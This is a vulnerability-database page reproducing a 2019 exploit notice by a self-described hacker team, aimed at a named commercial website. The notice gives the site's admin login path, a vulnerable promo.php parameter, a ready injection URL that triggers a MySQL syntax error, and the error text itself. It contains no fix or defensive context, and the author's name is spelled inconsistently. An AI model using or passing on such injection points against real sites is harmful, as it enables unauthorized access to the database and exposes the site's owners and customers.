SNAPY SQL INJECTION - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1779379 漏洞类型
发布时间 2019-10-13 更新时间 2019-10-13
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019100090
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################
# Exploit Title : SNAPY SQL INJECTION
# Author [ Discovered By ] : 5TUO1D-BOY 
# Team : GARUDA SECURITY HACKER
# Dork: N/A
# Date : 13/10/2019
# Vendor : snapy.co.id
# Tested On : Windows 7
# Exploit Risk : Medium
#################################
# Admin Panel Login Path :
**********************
/admin

# SQL Injection Exploit :
**********************

/branch/promo.php?start=[SQL INJECTION]&txt_cari=

##################################
#Example
**********************

http://www.snapy.co.id/branch/promo.php?start=8%27&txt_cari=

##################################

# Example Sql Database Error :
*************************


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '',4' at line 1

##################################
Discovered By 5TUP1D-BOY From Garuda Security Hacker